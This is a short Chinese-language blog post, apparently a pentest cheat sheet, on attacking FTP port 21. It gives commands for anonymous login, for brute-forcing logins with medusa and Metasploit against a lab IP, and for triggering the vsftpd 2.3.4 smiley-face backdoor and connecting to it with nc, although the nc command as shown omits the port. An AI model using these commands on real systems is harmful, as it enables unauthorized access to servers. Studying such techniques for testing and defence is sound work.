本文最后更新于634 天前,其中的信息可能已经过时
ftp21端口渗透
21端口开启的服务FTP代表文件传输协议,其用于在计算机网络上的客户端和服务器之间传输文件。默认端口是21,当共享数据时会被打开。
1.anonymous匿名登录
ftp 127.0.0.1
>anonymous
>anonymous
>ls -a
2.FTP暴力破解
分享一组ftp爆破字典
medusa暴力破解
medusa -h 172.16.1.107 -U /root/user.txt -P /root/pass.txt -M ftp
Metasploit暴力破解FTP登录
use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set rhosts 172.16.1.107
msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txt
msf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(ftp_login) > set stop_on_success true
msf auxiliary(ftp_login) > exploit
3.笑脸漏洞:)vsftpd版本号:2.3.4
输入ftp ip
输入用户名root:)
密码随便输
看见没用户名是个歪着的笑脸
此时再用nmap扫描就会多出6200这个端口
使用nc直接连接端口,就可以直接获取权限
nc -nvv 172.16.1.107
-u
指定nc使用UDP协议,默认为TCP
-v
输出交互或出错信息,新手调试时尤为有用
最后记住他只能连接一次,退出去就进不了了